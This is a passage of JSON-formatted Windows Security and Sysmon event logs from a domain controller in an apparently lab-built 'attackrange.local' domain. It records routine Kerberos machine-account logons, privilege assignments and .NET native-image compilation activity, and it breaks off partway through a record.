{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220697,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBA959\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t55015\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xba959","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"55015","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220698,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA959\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xba959","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220699,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA9C5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xba9c5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220700,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBA9C5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t55016\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xba9c5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"55016","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220701,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA9C5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xba9c5","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:02.696\r\nProcessGuid: {A837DB8D-0428-5F25-0000-001035A30B00}\r\nProcessId: 2540\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9ec-0\\System.Data.dll\r\nCreationUtcTime: 2020-08-01 05:57:02.696","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:02.696","ProcessGuid":"{A837DB8D-0428-5F25-0000-001035A30B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9ec-0\\System.Data.dll","CreationUtcTime":"2020-08-01 05:57:02.696","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6325,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:02.836\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-042E-5F25-0000-001064AC0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:02.836","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-042E-5F25-0000-001064AC0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6326,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:02.836\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-042E-5F25-0000-001064AC0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:02.836","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-042E-5F25-0000-001064AC0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6327,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:02.852\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-042E-5F25-0000-001064AC0B00}\r\nTargetProcessId: 2960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:02.852","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-042E-5F25-0000-001064AC0B00}","TargetProcessId":"2960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6328,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:03.274\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-042F-5F25-0000-00101DB00B00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:03.274","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-042F-5F25-0000-00101DB00B00}","TargetProcessId":"2848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6329,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:03.274\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-042F-5F25-0000-00101DB00B00}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 